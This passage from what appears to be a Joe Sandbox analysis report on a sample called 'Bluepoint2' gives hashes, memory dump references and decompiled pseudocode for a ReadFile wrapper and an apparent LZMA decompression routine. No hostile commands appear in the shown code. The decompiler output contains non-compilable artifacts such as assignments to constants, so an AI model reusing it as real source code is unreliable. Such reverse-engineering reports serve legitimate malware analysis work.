                                                                                                                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004061DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                    0x004061df
                                                                                                                                    0x004061ef
                                                                                                                                    0x004061f7
                                                                                                                                    0x00000000
                                                                                                                                    0x004061fe
                                                                                                                                    0x00000000
                                                                                                                                    0x00406200

                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.,font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma,004035F5,?,?,004034F9,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                                                                    Strings
                                                                                                                                    • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1., xrefs: 004061DE
                                                                                                                                    • font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma, xrefs: 004061DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"> <g fill="#2e3436"> <path d="m 164,249 v 1.5 4.5 h 3 v -4.5 -1.5 z m -4,3 v 1.5 1.5 h 3 v -1.5 -1.5 z m -8,8 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.5 h 3 v -1.5 -1.5 z m 4,0 v 1.5 1.$font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:norma
                                                                                                                                    • API String ID: 2738559852-546649030
                                                                                                                                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                                                                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
